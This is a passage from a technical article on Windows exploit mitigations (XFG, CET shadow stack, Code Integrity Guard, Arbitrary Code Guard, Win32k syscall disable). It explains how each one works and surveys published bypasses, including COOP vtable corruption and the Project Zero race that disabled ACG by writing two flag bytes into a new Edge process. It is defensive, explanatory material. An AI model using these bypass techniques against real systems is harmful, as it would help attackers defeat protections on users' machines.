&lt;p&gt;Those two limitations -- forward-edge only, coarse-grained -- are precisely the open questions section 5 (XFG, fine-graining) and section 6 (CET shadow stack, backward edge) answer. CFG was the first floor. The next two sections build out the rest.&lt;/p&gt;
&lt;h2&gt;5. eXtended Flow Guard (XFG): type-hash, fine-grained CFI for indirect calls&lt;/h2&gt;
&lt;p&gt;CFG knows &lt;em&gt;is this a function entry?&lt;/em&gt; XFG asks the better question: &lt;em&gt;is this the right kind of function entry?&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;The structural reason XFG exists has a name and a paper. May 2015, IEEE Symposium on Security and Privacy. Felix Schuster, Thomas Tendyck, Christopher Liebchen, Lucas Davi, Ahmad-Reza Sadeghi, and Thorsten Holz publish &lt;em&gt;Counterfeit Object-oriented Programming: On the Difficulty of Preventing Code Reuse Attacks in C++ Applications&lt;/em&gt; [@coop-ieeesecurity-pdf]. The paper&apos;s abstract is constructive and brutal: COOP is &quot;the first code-reuse attack to enable the synthesis of malicious behavior on x86 and ARM platforms&quot; that &quot;fully complies with previously presented coarse-grained CFI defenses.&quot;&lt;/p&gt;

We propose a new attack technique, called Counterfeit Object-Oriented Programming (COOP), which is the first code-reuse attack to enable the synthesis of malicious behavior on x86 and ARM platforms and which fully complies with previously presented coarse-grained CFI defenses. -- Schuster et al., IEEE S&amp;amp;P 2015 [@coop-ieeesecurity-pdf]

A code-reuse attack technique that chains legitimate C++ virtual function calls in attacker-chosen order, achieved by corrupting vtable pointers or vtable contents. Each individual callee is a real, address-taken function entry that passes any coarse-grained CFI bitmap. The attacker assembles Turing-complete computation by chaining these legitimate calls. Published by Schuster, Tendyck, Liebchen, Davi, Sadeghi, and Holz at IEEE S&amp;amp;P 2015 [@coop-ieeesecurity-pdf].
&lt;p&gt;The mechanism is simple to describe but hard to detect. The attacker corrupts a heap-resident C++ object&apos;s vtable pointer to point at a fake vtable they have crafted from gadget-like &lt;em&gt;virtual functions&lt;/em&gt; of real classes in the binary. Each entry in the fake vtable points at the entry of a real virtual method. The program&apos;s own virtual dispatch sequence performs the calls. The control transfers all land at legitimate function entries. CFG, which only asks &quot;is this a function entry?&quot;, sees nothing wrong.&lt;/p&gt;
&lt;p&gt;Microsoft&apos;s first public disclosure of the answer came at BlueHat Shanghai in 2019. David Weston -- listed on the title slide of the deck as &quot;Microsoft OS Security Group Manager&quot; -- presented the design of &lt;em&gt;eXtended Flow Guard&lt;/em&gt; (XFG) [@weston-bhshanghai-2019]. Microsoft never published a written XFG specification; the canonical public deconstruction is Connor McGarr&apos;s August 2020 reverse-engineering, which remains the best public account of how the mechanism actually works [@mcgarr-xfg].&lt;/p&gt;
&lt;p&gt;The mechanism is elegant. At compile time, MSVC computes a 64-bit type hash for every function: a truncated SHA-256 (first 8 bytes of the 32-byte digest) of the parameter count, parameter types, variadic flag, calling convention, and return type. The compiler stores this hash 8 bytes &lt;em&gt;before&lt;/em&gt; each CFG-valid function entry [@mcgarr-xfg]. At each indirect call site, the compiler knows the &lt;em&gt;expected&lt;/em&gt; prototype (from the call&apos;s static type), emits the same hash inline, and the dispatch thunk reads the 8 bytes preceding the target and compares.&lt;/p&gt;

flowchart TD
    A[Indirect call site] --&amp;gt; B{&quot;CFG bitmap&lt;br /&gt;bit set?&quot;}
    B --&amp;gt;|No| F1[__fastfail]
    B --&amp;gt;|Yes| C{&quot;XFG enabled?&quot;}
    C --&amp;gt;|No| D[Proceed&lt;br /&gt;CFG only]
    C --&amp;gt;|Yes| E[Read hash&lt;br /&gt;at target - 8]
    E --&amp;gt; G{&quot;Hash matches&lt;br /&gt;expected prototype?&quot;}
    G --&amp;gt;|No| F2[__fastfail&lt;br /&gt;same status]
    G --&amp;gt;|Yes| H[Proceed&lt;br /&gt;full XFG]
&lt;p&gt;A COOP attacker who replaces a vtable pointer with the address of a different real virtual function passes CFG: the new target is a valid function entry. They fail XFG: the 8 bytes preceding the new target encode a &lt;em&gt;different&lt;/em&gt; prototype hash than the call site expects. The fix moves the granularity from &quot;every function entry&quot; to &quot;every function entry compatible with this exact prototype&quot; -- orders of magnitude closer to perfect forward-edge CFI.&lt;/p&gt;
&lt;p&gt;XFG shipped in Windows 10 21H1 internals. The &lt;code&gt;/guard:xfg&lt;/code&gt; MSVC flag was added. The XFG dispatch thunks (&lt;code&gt;__guard_xfg_dispatch_icall_fptr&lt;/code&gt;) appeared in &lt;code&gt;ntdll.dll&lt;/code&gt;. Then it didn&apos;t enable by default.Connor McGarr&apos;s Black Hat USA 2025 deck, &lt;em&gt;Out of Control: How KCFG and KCET Redefine Control Flow Integrity in the Windows Kernel&lt;/em&gt;, states verbatim: &quot;XFG was never fully instrumented (UM/KM) and is now deprecated.&quot; McGarr is listed on the title slide as Software Engineer, Prelude Security [@mcgarr-bhusa25].&lt;/p&gt;

Two reasons XFG didn&apos;t ship enforcement-by-default. First, compatibility cost: XFG breaks any C-style cast through a different prototype. Windows is full of these, including in third-party drivers and inbox-COM components, and every breakage costs a customer ticket. Second, hardware overtook software. CET shadow stack arrived on Tiger Lake in September 2020 (section 6) and gave the entire backward edge for free, leaving the forward-edge problem partially un-fine-grained but the *complete* CFI surface achievable by composing CFG (forward, coarse) with CET (backward, perfect). The math worked out: ship CET strictly, and a coarse-grained forward edge is good enough -- because the backward edge, the bigger half of the call graph, is now perfect.&lt;p&gt;XFG remains the most interesting almost-shipped Windows mitigation. The instrumentation is in MSVC. The dispatch thunks are in &lt;code&gt;ntdll&lt;/code&gt;. Enforcement-by-default never arrived, and the McGarr 2025 deck names it as deprecated. The strategic pivot to hardware is what Microsoft made instead.
&lt;/p&gt;&lt;p&gt;&lt;/p&gt;
&lt;p&gt;What does that hardware look like, and what edge does it protect? Tiger Lake shipped in September 2020. For the first time since Shacham 2007, the kind of ROP that chains &lt;code&gt;ret&lt;/code&gt;-terminated gadgets could be killed by the CPU itself.&lt;/p&gt;
&lt;h2&gt;6. Hardware-enforced Stack Protection (Intel CET shadow stack)&lt;/h2&gt;
&lt;p&gt;The Microsoft Tech Community post that introduced CET shadow stack on Windows -- preserved on the Wayback Machine because the live URL is a JavaScript-rendered shell -- gives the framing in one sentence:&lt;/p&gt;

We shipped Control Flow Guard (CFG) in Windows 10 to enforce integrity on indirect calls (forward-edge CFI). Hardware-enforced Stack Protection will enforce integrity on return addresses on the stack (backward-edge CFI), via Shadow Stacks. -- Microsoft Tech Community, *Understanding Hardware-enforced Stack Protection* [@cet-techcommunity-wayback]

A second, per-thread stack maintained by the CPU in parallel with the regular call stack. Every `call` instruction pushes the return address to both stacks. Every `ret` pops both and compares. A mismatch raises a `#CP` (Control Protection) fault, which Windows surfaces as `STATUS_STACK_BUFFER_OVERRUN`. The shadow stack page is hardware-protected: only the write-family instructions `WRSS` and `WRUSS`, plus the call/ret/IRET microcode, can write to it. User-mode stores into a shadow-stack page fault.
&lt;p&gt;The mechanism, drawn from Intel&apos;s CET specification and Microsoft&apos;s Windows enabling documents [@cet-techcommunity-wayback, @wiki-intel-cet, @ms-cetcompat]:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Every &lt;code&gt;call&lt;/code&gt; instruction now writes the return address twice -- once to the regular stack, and once to the per-thread shadow stack at &lt;code&gt;[SSP]&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;The shadow-stack page is marked with a new MMU bit that makes it readable but not writable by general store instructions. Only the write-family instructions &lt;code&gt;WRSS&lt;/code&gt; and &lt;code&gt;WRUSS&lt;/code&gt;, plus the call/ret/IRET microcode, can store to it.&lt;/li&gt;
&lt;li&gt;Every &lt;code&gt;ret&lt;/code&gt; pops the regular stack and pops the shadow stack and compares. Equal: proceed. Different: raise &lt;code&gt;#CP&lt;/code&gt;. On Windows, &lt;code&gt;#CP&lt;/code&gt; is routed through the &lt;code&gt;KiRaiseException&lt;/code&gt; path as &lt;code&gt;STATUS_STACK_BUFFER_OVERRUN&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;New instructions exist for legitimate unwinding. &lt;code&gt;INCSSP imm&lt;/code&gt; advances the SSP across unwound frames -- the C++ &lt;code&gt;longjmp&lt;/code&gt; and the Windows SEH unwinder both use this. &lt;code&gt;RDSSP&lt;/code&gt; reads the current SSP into a register.&lt;/li&gt;
&lt;li&gt;The &lt;code&gt;/CETCOMPAT&lt;/code&gt; MSVC linker flag, available from Visual Studio 2019 onward, marks an x64 image as shadow-stack-compatible by setting the &lt;code&gt;IMAGE_DLLCHARACTERISTICS_EX_CET_COMPAT&lt;/code&gt; bit in the extended DLL characteristics word [@ms-cetcompat].&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Tiger Lake shipped CET first, in September 2020. AMD followed with the same architectural spec in Zen 3 in November 2020 [@wiki-intel-cet]. The two vendors implement the same instructions, the same MMU bit, the same fault. The shadow-stack image format is identical. Windows uses the same code paths on both.AMD Zen 3 was launched on November 5, 2020, two months after Tiger Lake [@wiki-intel-cet]. Both vendors implement the Intel CET specification verbatim, so Microsoft&apos;s Windows enabling code is single-source.&lt;/p&gt;

sequenceDiagram
    participant CPU
    participant RStack as Regular stack
    participant SStack as Shadow stack
    Note over CPU,SStack: function prologue
    CPU-&amp;gt;&amp;gt;RStack: push retaddr_A
    CPU-&amp;gt;&amp;gt;SStack: push retaddr_A (shadow)
    Note over CPU,SStack: attacker corrupts retaddr_A on regular stack to retaddr_X
    Note over CPU,SStack: function epilogue
    CPU-&amp;gt;&amp;gt;RStack: pop -&amp;gt; retaddr_X
    CPU-&amp;gt;&amp;gt;SStack: pop -&amp;gt; retaddr_A
    CPU-&amp;gt;&amp;gt;CPU: compare retaddr_X vs retaddr_A
    CPU-&amp;gt;&amp;gt;CPU: mismatch CP fault then STATUS_STACK_BUFFER_OVERRUN
&lt;p&gt;The Windows policy surface for CET is &lt;code&gt;ProcessUserShadowStackPolicy&lt;/code&gt;, structured exactly like every other policy in the enum -- a &lt;code&gt;DWORD&lt;/code&gt; of bitfields and a &quot;reserved&quot; tail [@ms-user-shadow-stack-policy]. Ten flags are documented:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;EnableUserShadowStack&lt;/code&gt; -- turn it on (compatibility mode: only shadow-stack violations in CETCOMPAT-marked modules are fatal)&lt;/li&gt;
&lt;li&gt;&lt;code&gt;AuditUserShadowStack&lt;/code&gt; -- log without enforcing&lt;/li&gt;
&lt;li&gt;&lt;code&gt;SetContextIpValidation&lt;/code&gt; -- block &lt;code&gt;SetThreadContext&lt;/code&gt; (and the equivalent &lt;code&gt;NtSetContextThread&lt;/code&gt; from a peer process) from setting an instruction pointer to an unguarded address&lt;/li&gt;
&lt;li&gt;&lt;code&gt;AuditSetContextIpValidation&lt;/code&gt; -- log version&lt;/li&gt;
&lt;li&gt;&lt;code&gt;EnableUserShadowStackStrictMode&lt;/code&gt; -- upgrade from compatibility mode (only CETCOMPAT-module shadow-stack violations are fatal) to strict mode (all shadow-stack violations are fatal, even in non-CETCOMPAT modules)&lt;/li&gt;
&lt;li&gt;&lt;code&gt;BlockNonCetBinaries&lt;/code&gt; -- the loader refuses to map non-&lt;code&gt;/CETCOMPAT&lt;/code&gt; DLLs into the process; strict policy for the most-hardened sandboxes&lt;/li&gt;
&lt;li&gt;&lt;code&gt;BlockNonCetBinariesNonEhcont&lt;/code&gt; -- like &lt;code&gt;BlockNonCetBinaries&lt;/code&gt;, but also requires images to carry &lt;code&gt;/guard:ehcont&lt;/code&gt; exception-handling continuation metadata&lt;/li&gt;
&lt;li&gt;&lt;code&gt;AuditBlockNonCetBinaries&lt;/code&gt; -- log version of &lt;code&gt;BlockNonCetBinaries&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;SetContextIpValidationRelaxedMode&lt;/code&gt; -- permits some legacy patterns&lt;/li&gt;
&lt;li&gt;&lt;code&gt;CetDynamicApisOutOfProcOnly&lt;/code&gt; -- requires &lt;code&gt;SetProcessValidCallTargets&lt;/code&gt;-style operations to come from a peer process&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The &lt;code&gt;SetContextIpValidation&lt;/code&gt; flag is worth a separate paragraph. The original CET shadow-stack design protected against attackers who corrupted return addresses on the regular stack. A more subtle attack used &lt;code&gt;SetThreadContext&lt;/code&gt; from a peer process (or, equivalently, the in-process &lt;code&gt;NtSetContextThread&lt;/code&gt;) to write a register-state structure containing an attacker-chosen &lt;code&gt;RIP&lt;/code&gt;. The thread, when resumed, would jump to that &lt;code&gt;RIP&lt;/code&gt; -- with no &lt;code&gt;ret&lt;/code&gt; instruction involved, so the shadow stack saw nothing. &lt;code&gt;SetContextIpValidation&lt;/code&gt; closes that hole by validating the requested &lt;code&gt;RIP&lt;/code&gt; against the bitmap before the kernel resumes the thread. Without it, CET shadow stack has a documented bypass [@ms-user-shadow-stack-policy].&lt;/p&gt;

A new CPU exception introduced with Intel CET. Raised when a shadow-stack compare fails on `ret`, or when an `endbranch` instruction is missing at an indirect-branch target (for IBT-style CET, separate from shadow stack). A stray write to a shadow-stack page from an ordinary store instead faults as a page fault (`#PF`) with the shadow-stack bit set in the error code. Windows routes `#CP` through `STATUS_STACK_BUFFER_OVERRUN`, the same status used for stack-canary violations and CFG failures.
&lt;p&gt;Compose CFG with CET shadow stack and you have the result the entire arc since Aleph One has been pointing at:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; CFG (forward edge) plus CET shadow stack (backward edge) equals full Control-Flow Integrity on x86-64, from compiler plus hardware. This is the cleanest moment in the article: two mitigations, from two different layers, compose into a property that took twenty years to assemble.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Full CFI is not the same as full security. CET still does not cover three structural attack classes. &lt;em&gt;Call-oriented programming&lt;/em&gt; and &lt;em&gt;jump-oriented programming&lt;/em&gt; chain gadgets ending in &lt;code&gt;call&lt;/code&gt; or &lt;code&gt;jmp&lt;/code&gt; rather than &lt;code&gt;ret&lt;/code&gt;; the call/return invariant is preserved, so CET sees nothing. &lt;em&gt;COOP&lt;/em&gt; chains entire legitimate virtual functions with matching call/return pairs; CET sees nothing. &lt;em&gt;Data-oriented&lt;/em&gt; attacks (section 13) never violate any control-flow invariant at all, because they never hijack control flow in the first place.&lt;/p&gt;
&lt;p&gt;We have constrained the control flow. We have not constrained which &lt;em&gt;code&lt;/em&gt; is in the process. An attacker can still load a malicious-but-signed-looking DLL through the loader, or persuade a JIT to emit attacker-chosen bytes into the JIT heap and then redirect a legitimate call to that JIT-allocated address. That is the &lt;em&gt;code&lt;/em&gt; layer, not the &lt;em&gt;control flow&lt;/em&gt; layer. The parallel mitigation path -- CIG and ACG -- is what closes it.&lt;/p&gt;
&lt;h2&gt;7. Code Integrity Guard (CIG): only signed images can load&lt;/h2&gt;
&lt;p&gt;Even if the attacker can&apos;t generate code and can&apos;t redirect control flow, they can still ask the loader to do it for them. Plant a Microsoft-signed DLL somewhere the loader will pick it up; &lt;code&gt;LoadLibrary&lt;/code&gt; runs the planted DLL&apos;s &lt;code&gt;DllMain&lt;/code&gt;; you have remote code execution through a trusted entry point. The structural answer is to restrict the universe of DLLs the loader will ever map into a hardened process.&lt;/p&gt;
&lt;p&gt;That is the function of &lt;em&gt;Code Integrity Guard&lt;/em&gt;. CIG first appeared in Microsoft Edge in Windows 10 1511 (November 2015) [@miller-acg-blog]. The canonical primary on its design is Matt Miller&apos;s February 2017 Edge blog &lt;em&gt;Mitigating arbitrary native code execution in Microsoft Edge&lt;/em&gt; [@miller-acg-blog]. The corresponding policy in &lt;code&gt;SetProcessMitigationPolicy&lt;/code&gt; is &lt;code&gt;ProcessSignaturePolicy&lt;/code&gt;, with the bitfield &lt;code&gt;PROCESS_MITIGATION_BINARY_SIGNATURE_POLICY&lt;/code&gt; [@ms-binary-signature-policy].&lt;/p&gt;

A per-process policy that restricts the set of binaries the loader will map into the process to images signed by an allowed code-signing root. Implemented in Windows via the `ProcessSignaturePolicy` mitigation policy. The most common configuration is `MicrosoftSignedOnly`, which restricts loads to Microsoft-rooted catalogue chains. Bypass attempts that load a malicious DLL into the process return `STATUS_INVALID_IMAGE_HASH` from `LoadLibrary` / `LoadLibraryEx` / `NtMapViewOfSection` [@miller-acg-blog, @ms-binary-signature-policy].
&lt;p&gt;The policy structure carries three levels:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;MicrosoftSignedOnly&lt;/code&gt; -- only images chaining to a Microsoft root will load&lt;/li&gt;
&lt;li&gt;&lt;code&gt;StoreSignedOnly&lt;/code&gt; -- only Microsoft Store-signed images&lt;/li&gt;
&lt;li&gt;&lt;code&gt;MitigationOptIn&lt;/code&gt; -- the loader accepts any image signed by Microsoft, the Windows Store, &lt;em&gt;or&lt;/em&gt; the Windows Hardware Quality Labs (WHQL); the broadest of the three signing-level settings&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Plus an &lt;code&gt;AuditMicrosoftSignedOnly&lt;/code&gt; audit-only flag that logs without blocking, for compatibility testing in the run-up to enforcement.&lt;/p&gt;

The kernel subsystem that enforces image-signing policy on user-mode binary loads. UMCI is the user-mode counterpart of KMCI (Kernel-Mode Code Integrity, used by Windows Driver Signature Enforcement and HVCI). CIG calls into UMCI on every `NtMapViewOfSection` to verify that the section&apos;s backing image is signed by an allowed root before the loader maps it.
&lt;p&gt;The mechanism is small. Every &lt;code&gt;LoadLibrary&lt;/code&gt;, every &lt;code&gt;LoadLibraryEx&lt;/code&gt;, and every &lt;code&gt;NtMapViewOfSection&lt;/code&gt; consults UMCI (User-Mode Code Integrity). If the image is not signed by a Microsoft-rooted catalogue chain when &lt;code&gt;MicrosoftSignedOnly&lt;/code&gt; is in effect, the load returns &lt;code&gt;STATUS_INVALID_IMAGE_HASH&lt;/code&gt; [@miller-acg-blog, @ms-binary-signature-policy]. The process keeps running; the DLL just doesn&apos;t load. (Most attack chains aren&apos;t structured to handle that gracefully, so in practice the process crashes shortly afterward when it tries to dereference a function pointer the failed DLL was supposed to provide.)&lt;/p&gt;
&lt;p&gt;CIG is a publisher check, not a content check. A Microsoft-signed DLL with a controllable side effect -- a DLL-search-order hijack against a signed Windows component, or the CVE-2013-3900 Authenticode-padding family that allows a signed binary to carry attacker-controlled trailing data without invalidating the signature -- still loads normally. CIG can&apos;t tell. &lt;em&gt;App Control&lt;/em&gt; (formerly Windows Defender Application Control) and the Microsoft Driver Block List are the partial answer: a curated list of banned-but-signed binaries UMCI consults and rejects even when their signatures verify.&lt;/p&gt;
&lt;p&gt;CVE-2013-3900 was disclosed in December 2013. Microsoft shipped an opt-in registry fix (&lt;code&gt;EnableCertPaddingCheck&lt;/code&gt;) and left the strict default off for over a decade for compatibility reasons; in July 2024 the company republished the CVE in the Security Update Guide to formally reaffirm that the strict-Authenticode behaviour remains available as an opt-in across all currently supported releases of Windows 10 and Windows 11 (&quot;Microsoft does not plan to enforce the stricter verification behavior as a default functionality on supported releases of Microsoft Windows&quot;) [@nvd-cve-2013-3900]. The structural-vulnerable-but-signed class has been operationally hard to retire for the same reason every backwards-compatibility constraint is hard to retire.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; &lt;code&gt;ProcessSignaturePolicy&lt;/code&gt; is applied to subsequent loader operations after the policy is installed. DLLs that were already mapped into the process before the call to &lt;code&gt;SetProcessMitigationPolicy&lt;/code&gt; are &lt;em&gt;not&lt;/em&gt; unloaded retroactively. This is the structural reason serious sandboxed processes (Edge content, Chrome renderer) use &lt;code&gt;UpdateProcThreadAttribute(PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY)&lt;/code&gt; at &lt;code&gt;CreateProcess&lt;/code&gt; time -- the kernel installs the policy &lt;em&gt;before&lt;/em&gt; the child&apos;s first user-mode instruction runs, so even the loader&apos;s initial sweep of static imports is policed.&lt;/p&gt;
&lt;/blockquote&gt;

The Microsoft-signed DLL universe is large. Many of those binaries have controllable side effects: search-order hijacks, Authenticode-padding writes, signed-driver privilege primitives, signed-tooling code-injection helpers. CIG does not look at side effects; it only looks at the signature. The residual class that survives `MicrosoftSignedOnly` -- &quot;signed but vulnerable&quot; -- is precisely the class App Control&apos;s reactive blocklist tries to keep up with. As of the 2025 Driver Block List there are hundreds of blocked-but-signed binaries; the list grows every quarter. This is one of the unsolved problems the article closes with in section 14.
&lt;p&gt;CIG and ACG are siblings but not synonyms. CIG prohibits &lt;em&gt;loading unsigned images&lt;/em&gt;. ACG prohibits &lt;em&gt;generating new executable code at runtime&lt;/em&gt;. They attack different attack surfaces. The signed-DLL-injection bypass that defeats CIG does not defeat ACG, because the planted DLL is not generating new code -- it is using its (signed but vulnerable) existing code. The JIT-spray-as-CFG-bypass that defeats ACG does not defeat CIG, because the JIT was not loading a new DLL. An attacker who solves one still has to solve the other.&lt;/p&gt;
&lt;p&gt;What does the &lt;em&gt;generation&lt;/em&gt; half look like?&lt;/p&gt;
&lt;h2&gt;8. Arbitrary Code Guard (ACG): W^X for the entire process&lt;/h2&gt;
&lt;p&gt;March 2017. Windows 10 Creators Update ships. Microsoft Edge enables a single flag in the new &lt;code&gt;ProcessDynamicCodePolicy&lt;/code&gt; structure. Every JavaScript JIT engine in the world has to be rearchitected.&lt;/p&gt;

A per-process policy that prevents *any* code that did not originate as a signed image at startup from becoming executable. With ACG enabled, calls to `VirtualAlloc` with `PAGE_EXECUTE_*` return `STATUS_DYNAMIC_CODE_BLOCKED`. Calls to `VirtualProtect` that attempt to *add* execute permission to an existing page return the same status. `MapViewOfSection` with `SECTION_MAP_EXECUTE` requires the section&apos;s backing image to be signed. The net effect: every executable byte in the process originated as a Microsoft-signed PE mapped by the loader at startup, and nothing else can ever become runnable in this process&apos;s address space [@miller-acg-blog, @ms-dynamic-code-policy].
&lt;p&gt;The &lt;code&gt;PROCESS_MITIGATION_DYNAMIC_CODE_POLICY&lt;/code&gt; structure carries four flags [@ms-dynamic-code-policy]:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;ProhibitDynamicCode&lt;/code&gt; -- the core enforcement flag&lt;/li&gt;
&lt;li&gt;&lt;code&gt;AllowThreadOptOut&lt;/code&gt; -- a thread can call &lt;code&gt;SetThreadInformation(ThreadDynamicCodePolicy, 0)&lt;/code&gt; to escape, which Microsoft&apos;s documentation warns against using with &lt;code&gt;ProhibitDynamicCode&lt;/code&gt; because the two flags together leak the policy&apos;s intent&lt;/li&gt;
&lt;li&gt;&lt;code&gt;AllowRemoteDowngrade&lt;/code&gt; -- a higher-privileged peer can disable the policy via &lt;code&gt;SetProcessMitigationPolicy&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;AuditProhibitDynamicCode&lt;/code&gt; -- log without enforcing&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The structural rule, restated mechanically [@miller-acg-blog, @ms-dynamic-code-policy]:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;code&gt;VirtualAlloc&lt;/code&gt; with &lt;code&gt;PAGE_EXECUTE&lt;/code&gt;, &lt;code&gt;PAGE_EXECUTE_READ&lt;/code&gt;, &lt;code&gt;PAGE_EXECUTE_READWRITE&lt;/code&gt;, or &lt;code&gt;PAGE_EXECUTE_WRITECOPY&lt;/code&gt;: blocked.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;VirtualProtect&lt;/code&gt; that adds any executable permission to an existing page: blocked.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;MapViewOfSection&lt;/code&gt; with &lt;code&gt;SECTION_MAP_EXECUTE&lt;/code&gt; for a section &lt;em&gt;not&lt;/em&gt; backed by a signed image: blocked.&lt;/li&gt;
&lt;li&gt;The only way new executable pages enter the process: the loader maps signed PEs at module load time, and (with CIG also on) only Microsoft-signed PEs.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The browser-JIT architectural consequence is the most-cited single change in the entire Windows mitigation literature. Pre-2017, every JavaScript JIT generated native code at runtime into a &lt;code&gt;RWX&lt;/code&gt;-permission heap inside its own browser process. The pattern was simple: allocate a page, write machine code into it, mark it executable, jump. ACG turned that pattern into a fatal error.&lt;/p&gt;
&lt;p&gt;Chakra (then Edge&apos;s engine), V8 (Chrome&apos;s engine, when Edge later switched to Chromium), SpiderMonkey (Firefox), and JavaScriptCore (Safari) all responded by moving the JIT compilation step out of the renderer process [@miller-acg-blog]. The architecture became: the renderer ships JavaScript source over an authenticated IPC channel to a &lt;em&gt;JIT process&lt;/em&gt;; the JIT process compiles to machine code; the JIT process owns a signed section backing the compiled output; the renderer maps that signed section read-execute via &lt;code&gt;MapViewOfFile&lt;/code&gt; and dispatches into it. The renderer is locked into ACG. The JIT process is not (it has to write code), but it never parses untrusted content -- only pre-validated bytecode from the renderer over a typed IPC schema.&lt;/p&gt;

flowchart LR
    subgraph Pre[&quot;Pre-ACG (before March 2017)&quot;]
        direction TB
        R1[Renderer process]
        R1 --&amp;gt; J1[In-process JIT]
        J1 --&amp;gt; H1[&quot;RWX JIT heap&lt;br /&gt;(W^X violation)&quot;]
        H1 --&amp;gt; E1[Execute jitted&lt;br /&gt;JS]
    end
    subgraph Post[&quot;Post-ACG (Edge 1703 and later)&quot;]
        direction TB
        R2[Renderer&lt;br /&gt;ACG on]
        R2 --&amp;gt;|IPC bytecode| J2[JIT process&lt;br /&gt;ACG off]
        J2 --&amp;gt;|signed&lt;br /&gt;section| S2[Shared mapping]
        R2 --&amp;gt;|MapViewOfFile&lt;br /&gt;R-X| S2
        S2 --&amp;gt; E2[Execute jitted&lt;br /&gt;JS in renderer]
    end
&lt;p&gt;That rearchitecture is the structural cost ACG imposed. It is not small. Out-of-process JIT adds roughly a millisecond per JIT compilation for the IPC round-trip, which matters for short-lived JavaScript (lots of small functions, one-shot pages). It also creates a new trust boundary -- between renderer and JIT process -- which is itself an attack surface, and which the next paragraph names.&lt;/p&gt;
&lt;p&gt;The bypass tradition starts almost immediately. Reported December 2017, publicly disclosed February 2018, Project Zero issue 42450607. James Forshaw and Ivan Fratric document the &lt;em&gt;race-the-mitigation-window&lt;/em&gt; class [@p0-issue-42450607, @exploit-db-44467]. The PoC is small enough to read in one paragraph.&lt;/p&gt;

Each Edge content process (`MicrosoftEdgeCP.exe`) called `SetProcessMitigationPolicy(ProcessDynamicCodePolicy, ...)` on itself shortly after startup. The advisory documents the verbatim callstack: `MicrosoftEdgeCP!SetProcessDynamicCodePolicy+0xc0`. Forshaw and Fratric discovered that there is a window between `CreateProcess` returning the new content process&apos;s handle and that child&apos;s first call into `SetProcessDynamicCodePolicy`. During that window, a peer content process in the same AppContainer can `OpenProcess(PROCESS_VM_WRITE | PROCESS_VM_OPERATION)` the new child and `WriteProcessMemory` two specific bytes -- at Edge offsets `0x23090` and `0x23092` on the version Forshaw and Fratric tested, build &quot;up-to-date on Windows 10 version 1709&quot; [@p0-issue-42450607]. The two bytes are global flags that, if set, cause `SetProcessDynamicCodePolicy` to short-circuit and return success without installing the policy. The result: a child renderer that *thinks* ACG is on, that the parent thinks has ACG on, but in which `VirtualAlloc(PAGE_EXECUTE_READWRITE)` succeeds normally. Microsoft&apos;s fix was structural: migrate to `UpdateProcThreadAttribute(PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY)`, so the policy is installed *by the kernel* before the child&apos;s first user-mode instruction runs and the race window closes.
&lt;p&gt;The second-generation bypass came faster than anyone expected. May 2018, Ivan Fratric publishes &lt;em&gt;Bypassing Mitigations by Attacking the JIT Server&lt;/em&gt; on the Project Zero blog [@p0-fratric-jit-2018]. Once ACG forced JIT out of process, the &lt;em&gt;new&lt;/em&gt; attack surface was the IPC channel and the JIT-server allocation address. Fratric writes: &quot;we believe that any other attempt to implement out-of-process JIT would encounter similar problems.&quot; That sentence is the deeper lesson of the entire mitigation tradition: a new trust boundary -- between renderer and JIT process, between user and kernel, between content process and broker -- is a new attack class. You did not eliminate the attack surface; you moved it.&lt;/p&gt;
&lt;p&gt;ACG plus CIG, then, closes &quot;what code can run in this process&quot;: no unsigned image loads (CIG), no dynamic code generation (ACG), no executable allocations of any kind that did not originate as a signed PE on disk. That is a closed surface for the &lt;em&gt;code&lt;/em&gt; dimension. But the attacker has more options than memory and signatures. There is the kernel surface beneath the renderer&apos;s syscalls. There is the legacy extension-point loader. There are fonts, image loads, side channels. Those are the smaller, operationally-critical mitigations -- the rest of the twenty.&lt;/p&gt;
&lt;h2&gt;9. The smaller, operationally critical mitigations&lt;/h2&gt;
&lt;p&gt;DEP, ASLR, CFG, CET, CIG, ACG -- that is the canonical six. But the &lt;code&gt;PROCESS_MITIGATION_POLICY&lt;/code&gt; enum lists twenty-one values [@ms-process-mitigation-enum]. The other fourteen actual policies are not afterthoughts. Each one is a tombstone for a specific attack class that did not fit into &quot;don&apos;t let the attacker write code&quot; or &quot;don&apos;t let the attacker pick the call target.&quot;&lt;/p&gt;
&lt;h3&gt;&lt;code&gt;ProcessSystemCallDisablePolicy&lt;/code&gt; -- Disable Win32k System Calls&lt;/h3&gt;
&lt;p&gt;Edge content process, 2017 onward. The Win32k.sys driver implements the GUI subsystem and was, for many years, the single largest contributor to Windows kernel CVEs. A renderer process that does not draw windows can refuse Win32k syscalls entirely, eliminating an enormous swath of kernel attack surface for a compromised renderer. The Edge content process is the canonical user. The Edge sandbox blog documents the AC architecture and capability model the renderer runs inside [@edge-sandbox-blog]; the policy enum entry itself is in &lt;code&gt;ms-setprocessmitigationpolicy&lt;/code&gt; [@ms-setprocessmitigationpolicy]. Connor McGarr&apos;s 2025 deck addresses the Win32k surface explicitly: &quot;Call targets in Win32k can be corrupted with a valid NT call target&quot; -- which is the structural reason the policy exists [@mcgarr-bhusa25].&lt;/p&gt;
